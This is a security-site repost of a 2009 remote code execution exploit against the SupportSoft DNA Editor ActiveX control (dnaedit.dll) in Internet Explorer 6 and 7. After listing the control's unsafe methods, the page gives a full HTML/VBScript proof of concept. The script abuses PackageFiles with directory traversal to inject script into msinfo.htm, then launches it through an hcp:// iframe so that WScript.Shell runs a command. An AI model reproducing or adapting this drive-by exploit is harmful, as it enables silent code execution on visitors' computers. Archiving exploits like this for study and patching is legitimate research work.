首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 SupportSoft DNA Editor Module (dnaedit.dll) Code Execution Exploit 来源：http://retrogod.altervista.org/ 作者：Nine 发布时间：2009-03-06   <!-- SupportSoft DNA Editor Module (dnaedit.dll v6.9.2205) remote code execution exploit (IE6/7)      by Nine:Situations:Group::bruiser      vendor url: http://www.supportsoft.com/      our site: http://retrogod.altervista.org/      details:      CLSID: {01110800-3E00-11D2-8470-0060089874ED}      Progid: Tioga.Editor.1      Binary Path: C:\Programmi\File comuni\SupportSoft\bin\dnaedit.dll      KillBitted: False      Implements IObjectSafety: True      Safe For Initialization (IObjectSafety): True      Safe For Scripting (IObjectSafety): True      vulnerabilities, discovered two months ago:      insecure methods: Packagefiles() - remote file overwrite, directory traversal, *script injection* and ... a crash (investigating on this one)                        SaveDna() - remote file creation, directory traversal                        AddFile() - remote cpu consumption                        SetIdentity() - remote file creation      This dll was present inside the SupportSoft ActiveX Controls Security Update for a previous buffer overflow vulnerability,      see: http://secunia.com/advisories/24246/      My download url was: http://www.supportsoft.com/support/controls_update.asp      actually unreachable      see also: http://www.securityfocus.com/archive/1/archive/1/461147/100/0/threaded      Well, they probably patched my marking them unsafe for initialization (I see that the ScriptRunner module suffers  of a      buffer overflow bug in the Evaluate() method...) but they gave you another vulnerable control... --> <HTML> <OBJECT classid='clsid:01110800-3E00-11D2-8470-0060089874ED' width=1 height=1 id='DNAEditorCtl' /> </OBJECT> <SCRIPT language='VBScript'> <!-- sh="<HTML><SCRIPT LANGUAGE=VBScript>" + unescape("Execute%28unescape%28%22Set%20s%3DCreateObject%28%22%22WScript.Shell%22%22%29%250D%250As.Run%20%22%22cmd%20%252fc%20start%20calc%22%22%22%29%29") + "<" + Chr(47) + "SCRIPT><" + Chr(47) + "HTML>" 'file path is injected in msinfo.htm, you can see the code by an hex editor, some limit with *number* of chars, some problem with newlines, resolved with vbscript code evaluation by Execute(), a popup says Unable to post... click Ok or close it and you are pwned DNAEditorCtl.PackageFiles sh + "../../../../../../../../../WINDOWS/PCHEALTH/HELPCTR/System/sysinfo/msinfo.htm" 'launch the script and calc.exe trough the Help and Support Center Service document.write("<iframe src=""hcp://system/sysinfo/msinfo.htm"">") --> </SCRIPT>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Media Commands .m3l File Local ·Media Commands (m3u File) Univ ·Winamp <= 5.541 Skin Universal ·Multiple Vendors libc:fts_*() ·Ghostscripter Amazon Shop remo ·Joomla com_ijoomla_archive Bli ·Libra PHP File Manager version ·Internet Explorer 8 beta RC1 h ·Easy Web Password 1.2 Local He ·Phortail version 1.2.1 proof o ·EFS Easy Chat Server Authentic ·Nokia Multimedia Player 1.0 (p   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved